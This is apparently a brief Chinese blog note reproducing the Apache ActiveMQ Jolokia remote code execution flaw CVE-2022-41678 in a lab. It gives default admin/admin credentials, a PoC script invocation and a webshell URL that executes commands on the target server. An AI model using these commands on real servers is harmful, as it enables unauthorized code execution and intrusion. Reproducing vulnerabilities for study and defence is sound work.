activemq-CVE-2022-41678

C9ccc002024-07-14 3:02

Apache ActiveMQ Jolokia 后台远程代码执行漏洞

Apache ActiveMQ在5.16.5,5.17.3版本及以前,后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。

启动环境

admin/admin

方法一:利用poc

这个方法受到ActiveMQ版本的限制,因为Log4j2是在5.17.0中才引入Apache ActiveMQ

方法二:

python poc.py -u admin -p admin --exploit jfr http://localhost:8161

http://192.168.62.131:8161/admin/shelljfr.jsp?cmd=id

相关推荐
d111111111d几秒前
什么是内存对齐?在STM32上面如何通过编辑器指令来实现内存对齐。
笔记·stm32·单片机·嵌入式硬件·学习·编辑器
蒙奇D索大31 分钟前
【数据结构】考研408 | 伪随机探测与双重散列精讲:散列的艺术与均衡之道
数据结构·笔记·学习·考研
舞动青春881 小时前
Ubuntu安装QEMU过程及问题记录
linux·学习·ubuntu
知识分享小能手1 小时前
Ubuntu入门学习教程,从入门到精通,Ubuntu 22.04的基本配置 (3)
linux·学习·ubuntu
黑客思维者1 小时前
机器学习012:监督学习【回归算法】(对比)-- AI预测世界的“瑞士军刀”
人工智能·学习·机器学习·回归·逻辑回归
我想我不够好。1 小时前
实操练习 12.20
学习
Crkylin1 小时前
尚硅谷Linux应用层学习笔记(一)GCC编译
linux·笔记·学习
车载测试工程师1 小时前
CAPL学习-AVB交互层-功能函数-监听器函数函数
网络·学习·tcp/ip·capl·canoe
andwhataboutit?2 小时前
pytorch-CycleGAN-and-pix2pix学习
人工智能·pytorch·学习
vv_5012 小时前
大模型 langchain-组件学习(中)
人工智能·学习·langchain·大模型
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04BongoCat - 跨平台键盘猫动画工具05在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)06jdk21下载、安装(Windows、Linux、macOS)07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08sqli-labs靶场通关笔记:第18-19关 HTTP头部注入09Open-AutoGLM Windows 安装部署教程10RedissonClient的配置解析